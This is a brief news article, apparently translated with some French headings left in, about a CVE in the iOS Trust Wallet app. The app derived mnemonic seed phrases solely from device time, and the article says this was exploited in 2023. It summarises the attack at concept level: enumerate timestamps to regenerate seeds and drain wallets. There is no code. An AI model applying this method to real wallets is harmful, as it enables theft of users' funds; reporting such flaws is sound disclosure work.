The National Institute of Standards and Technology (NIST) is conducting an investigation into a potential vulnerability in the iOS app ‘Binance Trust Wallet’. This vulnerability could expose users to funds theft through mnemonic word guessing.
Détails de la faille et implications
Registered on February 8 in the CVE database, which lists serious issues that could cause hardware damage or losses, this vulnerability is currently being studied by the NIST to assess its real-world severity. The vulnerability has already been exploited, allowing attackers to systematically generate mnemonics for each timestamp within an applicable period and link them to specific wallet addresses to steal funds.
The Binance Trust Wallet app for iOS in commit 3cd6e8f647fbba8b5d8844fcd144365a086b629f, git tag 0.0.4 misuses the trezor-crypto library and therefore generates mnemonics for which the device’s time is the only source of entropy, leading to financial losses, as exploited in July 2023. An attacker can systematically generate mnemonics for each timestamp within a given period, and link them to specific wallet addresses to steal funds from those wallets.
NIST Agency
Conséquences pour Trust Wallet
Trust Wallet fell victim to multiple cyber incidents in 2023, resulting in losses of over $4 million. Acquired by Binance in 2018, Trust Wallet is now a separate legal entity operating independently of Binance.com, according to a Binance spokesperson. To date, Trust Wallet has not communicated about this vulnerability through its X profile, and Binance has since launched its own Web3 wallet.